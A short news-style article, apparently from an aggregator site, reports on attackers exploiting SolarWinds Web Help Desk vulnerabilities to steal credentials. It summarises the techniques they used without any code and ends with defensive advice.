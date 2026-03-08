SolarWinds WHD Under Attack: Critical Vulnerabilities Exploited to Steal High-Privilege Credentials (2026)

SolarWinds Web Help Desk (WHD) has been under attack, with intruders exploiting vulnerabilities to steal high-privilege credentials. The attackers remain unknown, and the exact method of exploitation is still a mystery. Microsoft researchers have identified two critical vulnerabilities in WHD: CVE-2025-40551 and CVE-2025-40536, both of which could allow remote code execution and unauthorized access. However, the threat hunters cannot confirm if these vulnerabilities were the primary entry points, as the attacks occurred in December 2025 on machines vulnerable to both old and new CVEs. SolarWinds has also patched CVE-2025-26399, a critical flaw that allowed remote attackers to run commands on host machines, but it took three attempts to get the patch right. The attackers used a technique called 'living off the land' by exploiting legitimate Windows features like BITS for payload download and execution. They also installed Zoho ManageEngine, a remote monitoring tool, to gain long-term control. The intruders enumerated sensitive domain users and groups, established reverse SSH and RDP access, and used DLL sideloading to steal credentials. Security experts advise applying WHD patches and removing public access to admin paths. Additionally, security teams should scan for and remove unauthorized RMM tools and rotate credentials, especially for service and admin accounts accessible via WHD.

SolarWinds WHD Under Attack: Critical Vulnerabilities Exploited to Steal High-Privilege Credentials (2026)

References

Top Articles
Blues Trade Nick Bjugstad to Devils: Full Breakdown & Impact for Both Teams
Exciting Updates on Kevin Feige's Role in Marvel Ahead of New Avengers Movies
Cigna's Major Settlement: Antitrust Case Over Insulin Pricing Explained
Latest Posts
Discover Polenta: The Comfort Food of the Winter Olympics
Speeding Driver Fined and Banned: 70+ mph in a 30 Zone
Recommended Articles
Article information

Author: Twana Towne Ret

Last Updated:

Views: 6513

Rating: 4.3 / 5 (44 voted)

Reviews: 91% of readers found this page helpful

Author information

Name: Twana Towne Ret

Birthday: 1994-03-19

Address: Apt. 990 97439 Corwin Motorway, Port Eliseoburgh, NM 99144-2618

Phone: +5958753152963

Job: National Specialist

Hobby: Kayaking, Photography, Skydiving, Embroidery, Leather crafting, Orienteering, Cooking

Introduction: My name is Twana Towne Ret, I am a famous, talented, joyous, perfect, powerful, inquisitive, lovely person who loves writing and wants to share my knowledge and understanding with you.